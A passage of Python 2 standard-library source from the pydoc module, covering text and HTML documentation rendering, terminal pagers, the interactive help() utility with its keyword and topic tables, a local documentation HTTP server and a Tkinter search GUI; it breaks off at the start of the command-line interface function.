# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(__builtin__, path):
return getattr(__builtin__, path)
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input, output):
self.input = input
self.output = output
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
def __call__(self, request=None):
if request is not None:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper(sys.stdin, sys.stdout)
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
try: import warnings
except ImportError: pass
else: warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# --------------------------------------------------- web browser interface
def serve(port, callback=None, completer=None):
import BaseHTTPServer, mimetools, select
# Patch up mimetools.Message so it doesn't break if rfc822 is reloaded.
class Message(mimetools.Message):
def __init__(self, fp, seekable=1):
Message = self.__class__
Message.__bases__[0].__bases__[0].__init__(self, fp, seekable)
self.encodingheader = self.getheader('content-transfer-encoding')
self.typeheader = self.getheader('content-type')
self.parsetype()
self.parseplist()
class DocHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(html.page(title, contents))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport, value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = filter(lambda x: x != '__main__',
sys.builtin_module_names)
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(BaseHTTPServer.HTTPServer):
def __init__(self, port, callback):
host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = BaseHTTPServer.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts web server and pops up a control window)."""
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import Tkinter
self.server_frm = Tkinter.Frame(window)
self.title_lbl = Tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = Tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = Tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = Tkinter.Frame(window)
self.search_lbl = Tkinter.Label(self.search_frm, text='Search for')
self.search_ent = Tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = Tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = Tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = Tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = Tkinter.Frame(window)
self.goto_btn = Tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = Tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
try:
import webbrowser
webbrowser.open(url)
except ImportError: # pre-webbrowser.py compatibility
if sys.platform == 'win32':
os.system('start "%s"' % url)
elif sys.platform == 'mac':
try: import ic
except ImportError: pass
else: ic.launchurl(url)
else:
rc = os.system('netscape -remote "openURL(%s)" &' % url)
if rc: os.system('netscape "%s" &' % url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = split(self.result_lst.get(selection[0]))[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import Tkinter
try:
root = Tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and find(x, os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage: pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
